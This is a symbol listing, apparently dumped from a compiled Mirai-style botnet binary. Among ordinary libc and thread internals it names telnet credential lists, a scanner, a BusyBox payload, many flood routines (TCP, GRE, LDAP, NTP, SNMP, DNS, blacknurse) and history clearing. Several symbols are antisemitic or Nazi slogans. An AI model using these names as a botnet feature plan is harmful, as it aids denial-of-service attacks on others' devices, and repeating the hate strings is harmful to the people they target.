__GI_xdr_long
__exit_cleanup
Mirai_Usernames
xdr_wrapstring
xdr_rejected_reply
__GI___rpc_thread_createerr
__GI_execl
__GI_asprintf
__GI_srandom_r
rseed
SendTheSTD
pthread_condattr_destroy
__GI___ctype_tolower
pthread_attr_setscope
write
spoofs
dns2ip
__rpc_thread_variables
environ
__GI_close
xdr_free
getBuild
xdr_netobj
fprintf
__resolv_lock
kill
__GI_getservent_r
fputs_unlocked
__pthread_mutex_trylock
__pthread_destroy_specifics
svc_register
xdr_long
pthread_mutexattr_setkind_np
__GI_svcerr_decode
__GI_brk
_svcauth_short
bind
__GI_nanosleep
vseflood
_376
__GI_strtok
svcerr_systemerr
_stdio_openlist
if_nameindex
__GI_sigprocmask
inet_addr
ntohl
__GI_fseek
__pthread_nonstandard_stacks
__GI_clntudp_bufcreate
HTTP
thanks
__GI___libc_open64
pthread_cond_broadcast
pthread_once
if_nametoindex
__pthread_once_fork_child
pthread_attr_setinheritsched
__pthread_alt_lock
pmap_unset
__pthread_manager_adjust_prio
fseeko
_stdio_openlist_del_count
disable
__pthread_manager_thread
__pthread_setconcurrency
setsockopt
spoofsm
xdr_short
bsd_signal
head
fseek
mremap
GRE_src_ip
pthread_setschedparam
__GI_kill
__GI_strcmp
svc_getreqset
setup_raw_udp_header
__GI_memmove
move
sendSTD
setstate
__decode_dotted
__GI_pthread_cond_broadcast
__pthread_perform_cleanup
__stdio_READ
__GI_vasprintf
pthread_key_create
memchr
__GI_toupper
__pthread_initialize_minimal
__GI_recv
svc_getreq_poll
__stdin
stdin
__GI_clnt_sperrno
__new_sem_wait
wait
xdr_accepted_reply
__GI_isatty
__libc_open64
pthread_setconcurrency
gethostbyname2_r
sem_init
greflood
svcerr_weakauth
xdr_authunix_parms
__pthread_mutex_destroy
__pthread_mutexattr_getkind_np
__pthread_handles_num
__GI_freeaddrinfo
strcasestr
_start
sem_close
__deregister_frame_info_bases
__GI_xdr_opaque_auth
touchMyself
strstr
__GI_ioctl
xdr_u_longlong_t
init_rand
rand
pthread_kill
signal
read
__GI_xdr_int
__pthread_manager_request
__pthread_internal_tsd_get
__decode_header
pread64
__linuxthreads_pthread_sizeof_descr
pthread_attr_setstacksize
__GI___h_errno_location
xdr_u_char
__GI_memcpy
sendmsg
in6addr_loopback
__GI_strtoul
strcoll
clntudp_create
strncmp
makeRandomShit
__GI_xdr_callhdr
wcsrtombs
_stdio_user_locking
__pthread_internal_tsd_address
filter
__cmsg_nxthdr
__GI_svcerr_noprog
__GI_sigdelset
hold
strncpy
__GI_getservbyname_r
strcasecmp
htonl
sendto
__exit_count
xdr_u_long
__C_ctype_toupper
__GI_open64
sched_get_priority_max
__GI___C_ctype_b
xdr_replymsg
pthread_sigmask
Telnet_Passwords
realloc
on_exit
__libc_siglongjmp
nummasters
__GI_gethostbyname_r
__opensock
__GI_pthread_cond_signal
__GI_strncpy
realrand
_PRIVMSG
MiraiIPRanges
__libc_send
__GI___xpg_strerror_r
__pthread_attr_setstackaddr
__GI___C_ctype_tolower
__GI_recvfrom
Mirai_Passwords
pthread_cond_init
tcpflood
__GI_getrlimit
bcopy
__GI_strcpy
__GI_inet_ntop
strtok
__GI___fputc_unlocked
sigfillset
memcmp
listen
svcerr_noprog
sched_get_priority_min
_NICK
ClearHistory
__stdio_adjust_position
xdr_opaque
malloc_trim
fdopen
Borrow or rob
_vfprintf_internal
__GI_poll
__GI_nrand48_r
__GI_strcasestr
Busybox_Payload
fork
__pthread_restart
__GI_pthread_attr_setschedpolicy
pthread_mutexattr_getpshared
__GI_pthread_attr_setinheritsched
__stdio_rfill
strncat
__GI_pthread_attr_getscope
__GI_bindresvport
__libc_pause
sem_trywait
__GI_sleep
__GI_gethostbyname
sigaction
SendTCP
_dl_phdr
__pthread_mutexattr_init
__GI_svc_sendreply
__GI_getc_unlocked
__GI___libc_fcntl64
__uClibc_init
xdr_callhdr
__GI_munmap
tehport
_store_inttype
__length_dotted
__getpagesize
__GI_random
__GI_mremap
__syscall_error
__uclibc_progname
__GI_getegid
__GI_wait4
__malloc_lock
__uClibc_main
sbrk
__rtld_fini
__GI_svcerr_progvers
__GI_fork
sleeptime
__libc_close
strdup
__pthread_internal_tsd_set
__GI_getpid
inet_aton
pthread_condattr_getpshared
UserAgents
index
_pthread_cleanup_push_defer
__sigismember
blacknurse
gettimeofday
fopen
__bss_start
__GI_pthread_self
__libc_open
memset
__GI_socket
main
__GI___libc_lseek
MiraiScanner
__glibc_strerror_r
__GI_sigfillset
__rpc_thread_clnt_cleanup
__GI_fputc
listFork
__GI_xdr_union
__GI___C_ctype_tolower_data
__stdio_fwrite
negotiate
srand
__rpc_thread_svc_pollfd
__GI_setservent
initstate
__GI_pthread_attr_setscope
fclose
__syscall_rt_sigaction
open64
xdr_string
ntohs
pthread_mutexattr_settype
inet_ntoa
getppid
tcgetattr
gethostbyaddr_r
getservbyport
getspoofs
__C_ctype_tolower_data
snmpflood
__libc_recvfrom
time
__pthread_threads_events
histClear
__libc_system
__GI_abort
pthread_mutexattr_setpshared
poll
killall
poww
__GI_pthread_cond_wait
__GI_pthread_cond_init
host2ip
__GI_pthread_cond_destroy
__GI_xdr_u_short
doGasEm
xdr_u_int
putc
help
__GI_fprintf
pthread_attr_getdetachstate
__pthread_last_event
__get_hosts_byname_r
setup_snmp_header
__stdio_init_mutex
__GI__exit
__libc_recvmsg
strcmp
IPh_src_ip
connectotalTimeout
pthread_mutex_unlock
callrpc
advances2
__nameserver
data_start
_seterr_reply
__rpc_thread_svc_fdset
__GI_sysconf
makeFukdString
__pthread_manager_reader
__GI_rewind
__pthread_initial_thread
__GI_in6addr_loopback
__h_errno_location
__GI_putc_unlocked
__GI___rpc_thread_svc_pollfd
Telnet_Usernames
matchPrompt
getcwd
__C_ctype_b_data
__GI_inet_pton
gethostbyname
_stdio_fopen
advance_state
__GI_xdr_u_hyper
__GI_pthread_setschedparam
HeilKuze
_fini
__GI_xdr_opaque
setup_vse_ip_header
authnone_create
__vfork
__GI_mmap
BurnTheJews
__GI_xdr_array
getservbyname
knownBots
contains_success
sprintf
__pthread_offsetof_descr
__new_sem_trywait
asprintf
msync
__get_pc_thunk_bx
strerror_r
__GI_ffs
__GI_select
sendTheGre
__libc_waitpid
__pthread_unlock
__libc_multiple_threads
sem_open
socket_connect
__GI_xdr_bool
__rpc_thread_destroy
__GI_waitpid
wgetHTTP
__GI_xdr_u_int
__GI_xdr_enum
_stdio_term
__GI_vfprintf
__decode_answer
__GI_signal
numservers
__pthread_attr_setguardsize
stderr
fails
__pthread_exit_requested
__pthread_attr_getguardsize
__pthread_manager_thread_tos
__GI_pthread_exit
vfork
__C_ctype_b
__pthread_once_fork_parent
srandom
_ppfs_setargs
__GI_sendto
__GI_sigemptyset
__GI_printf
__libc_fork
nickc
changeservers
sigismember
__atexit_lock
scanPid
__linuxthreads_reap_event
fsync
rand_cmwc
__pthread_manager
fputc
__libc_lseek
killd
doMirai
__GI_xprt_unregister
clnt_sperror
__GI_pmap_set
ParseResolverLine
__pthread_getconcurrency
__pthread_alt_timedlock
advances
__libc_fcntl64
_pthread_cleanup_push
pread
pthread_self
setup_vse_header
pthread_setcanceltype
getsockopt
__GI_fseeko64
__pthread_once_fork_prepare
pthread_mutexattr_init
getaddrinfo
__libc_wait
fflush_unlocked
__stdio_wcommit
dnsflood
__exit_slots
contains_string
__GI___fgetc_unlocked
strwildmatch
__nameservers
fwrite_unlocked
inet_ntoa_r
__pagesize
_stdio_openlist_add_lock
setup_xdmcp_udp_header
__GI_getdtablesize
contains_response
__GI_recvmsg
__GI_pthread_attr_getschedpolicy
__drand48_iterate
randstring
_edata
__stdout
__GI_memrchr
__GI_fflush_unlocked
in_cksum
__GI_xdr_u_long
__GI_strstr
__searchdomains
_end
sendTheLDAP
bindresvport
__pthread_threads_max
__GI_listen
htons
pthread_mutex_destroy
svc_fdset
GRE_dst_ip
__rpc_thread_createerr
_sigintr
rewind
chan
_ppfs_prepargs
msgs
__GI_strspn
fgetc_unlocked
initstate_r
pthread_mutex_lock
ntpflood
__GI_svc_getreq_common
if_freenameindex
__new_sem_getvalue
__GI_connect
__curbrk
sem_getvalue
__libc_poll
pthread_cond_wait
_dl_phnum
__GI_pthread_equal
_fpmaxtostr
svc_unregister
__errno_location
__pthread_timedsuspend
__GI_pmap_getport
_stdlib_strto_l
__GI___libc_open
exit
__stdio_WRITE
_stdio_init
pthread_attr_setguardsize
__GI_geteuid
append
__GI_sendmsg
sigdelset
inet_ntop
pthread_mutex_trylock
__GI_pthread_setcancelstate
_null_auth
pthread_atfork
__C_ctype_toupper_data
__GI_getcwd
_dl_aux_init
sendJUNK
setup_ip_header
__GI_perror
__libc_sendmsg
_errno
_authenticate
__GI_gettimeofday
atoi
__GI_putc
successes
_stdio_openlist_del_lock
pthread_cond_destroy
update
__GI_inet_aton
__GI_getaddrinfo
_PING
pthread_attr_setschedpolicy
__GI_svc_getreq_poll
fgets_unlocked
__pthread_mutexattr_getpshared
endservent
__GI_bind
_exit
szprintf
__pthread_timedsuspend_new
__pthread_sig_cancel
__GI_xdr_void
__get_hosts_byaddr_r
__GI_lseek
__pthread_sig_restart
greh
strspn
__pthread_offsetof_pid
__libc_recv
__pthread_main_thread
pthread_mutex_init
__pthread_cleanup_pop_restore
__libc_creat
__pthread_attr_getstacksize
strlen
__GI___cmsg_nxthdr
lseek64
open
clone
Temp_Directorys
xdr_array
toupper
__libc_write
__malloc_consolidate
_ppfs_parsespec
__GI_strtol
__GI_getuid
__GI_strtok_r
__GI_errno
__fork
__libc_sendto
__stdio_trans2w_o
__GI_vfork
__GI__authenticate
strchr
__GI_rawmemchr
__GI_gethostbyname2_r
__GI_srand48_r
fputs
svc_max_pollfd
__GI_raise
pthread_attr_setschedparam
__data_start
__pthread_sizeof_handle
__pthread_provide_wrappers
setsid
__GI_inet_addr
God A red nugget A fat egg under a dog
__GI_svc_unregister
__GI_pthread_condattr_init
rawudpflood
rpc_createerr
__libc_msync
__encode_dotted
__GI_strnlen
_Jv_RegisterClasses
__pthread_threads_debug
vasprintf
pthread_attr_setdetachstate
recvmsg
fputc_unlocked
svc_pollfd
readUntil
__libc_sigsuspend
__GI_xdr_hyper
fcntl
ldapflood
__GI_xdr_bytes
sched_yield
flooders
pthread_join
SeigHeil
__GI__rpc_dtablesize
pthread_getconcurrency
read_with_timeout
__GI_fdopen
__GI_atoi
setup_gre_ip_header
fseeko64
pthread_cond_timedwait
__GI_sprintf
clntudp_bufcreate
mkdir
__ctype_tolower
__GI_svc_getreqset
__GI_pthread_attr_getinheritsched
sigwait
wcrtomb
__GI___rpc_thread_svc_max_pollfd
pwrite
close
replStr
__libc_connect
pthread_attr_getschedparam
junk
srand48_r
__GI_strlen
sendHOLD
pids
vfprintf
strpbrk
_433
pthread_setspecific
xdr_int
xdr_hyper
sigsuspend
_load_inttype
raise
__GI_mkdir
clnt_sperrno
free
xdr_u_short
sigprocmask
__fputc_unlocked
__GI_authnone_create
__GI_xdr_short
